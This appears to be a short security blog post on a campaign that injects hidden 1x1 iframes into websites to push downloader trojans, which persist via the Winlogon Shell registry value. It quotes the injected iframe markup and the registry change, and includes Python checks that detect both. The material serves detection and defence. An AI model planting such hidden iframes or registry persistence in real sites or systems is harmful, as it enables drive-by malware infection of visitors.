Tortures Web Surfers

Over the past several weeks, a multitude of sites have been injected with malicious iframes that point to exploit code (which in turn installs downloader trojans) located on the attacker-owned ‘’. The form is always the same:

<iframe src="" width=1 height=1 style="visibility:hidden;position:absolute">

where random is a numeric identifier that differs for each compromised site.

The most recently discovered victim of iframe injection is the website of the Bangladesh Directorate of Primary Education. The Nigerian Tribune ( ) is also among the sites compromised in these injection attacks.

The attack site delivers the malware intermittently, remaining dormant in between attacks. The trojan downloader delivered via the attacks modifies the Winlogon Shell = Explorer value as follows:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\
Value: Shell = Explorer.exe <path to downloader>

By default, the value should read simply “Shell = Explorer.exe” with no additional file specified.
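As an added example (not code from the original post): two defensive checks in Python, one that flags 1x1 or hidden iframes of the form shown above in a page body, and one that tests whether a Winlogon Shell value launches only Explorer.exe. The sample page fragment and the attacker-host placeholder are constructed; the real domain is not on this page.

```python
import re
from html.parser import HTMLParser
from typing import List

# Constructed sample page fragment: one injected 1x1 hidden iframe next to a
# legitimate, visible embed. The attacker host is a placeholder, not a real IoC.
SAMPLE_HTML = """<html><body><p>Welcome</p>
<iframe src="http://ATTACKER-DOMAIN-PLACEHOLDER/12345" width=1 height=1
 style="visibility:hidden;position:absolute"></iframe>
<iframe src="https://example.org/embed" width=600 height=400></iframe>
</body></html>"""


class HiddenIframeFinder(HTMLParser):
    """Collects the src of every iframe that is tiny (0/1 px) or hidden by inline style."""

    def __init__(self) -> None:
        super().__init__()
        self.suspicious: List[str] = []

    def handle_starttag(self, tag: str, attrs) -> None:
        if tag != "iframe":
            return
        a = {k: (v or "") for k, v in attrs}          # html.parser lowercases names
        style = a.get("style", "").replace(" ", "").lower()
        tiny = a.get("width", "") in ("0", "1") and a.get("height", "") in ("0", "1")
        hidden = "visibility:hidden" in style or "display:none" in style
        if tiny or hidden:
            self.suspicious.append(a.get("src", ""))


def find_hidden_iframes(page: str) -> List[str]:
    """Return the src values of suspicious iframes found in a page body."""
    finder = HiddenIframeFinder()
    finder.feed(page)
    return finder.suspicious


def winlogon_shell_is_clean(value: str) -> bool:
    """True only if the Winlogon Shell value launches explorer.exe and nothing else.

    Windows accepts a comma-separated list here; the downloader described above
    appends its path after a space, so both separators are treated as delimiters.
    A path containing spaces splits into extra tokens, which is still correctly flagged.
    """
    entries = [e for e in re.split(r"[,\s]+", value.strip()) if e]
    return [e.lower() for e in entries] == ["explorer.exe"]
```

On a live host the value to feed `winlogon_shell_is_clean` is read from the registry key quoted above; the page check can be run over any saved copy of a site's HTML.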

As its name suggests, a downloader trojan downloads additional malware to the infected computer. Most of today’s malware consists of remotely configurable data theft trojans. Heartland Payment Systems is the poster child for what today’s malware is capable of doing.

Alexbtp – Anderson_neo – Compiled from the internet
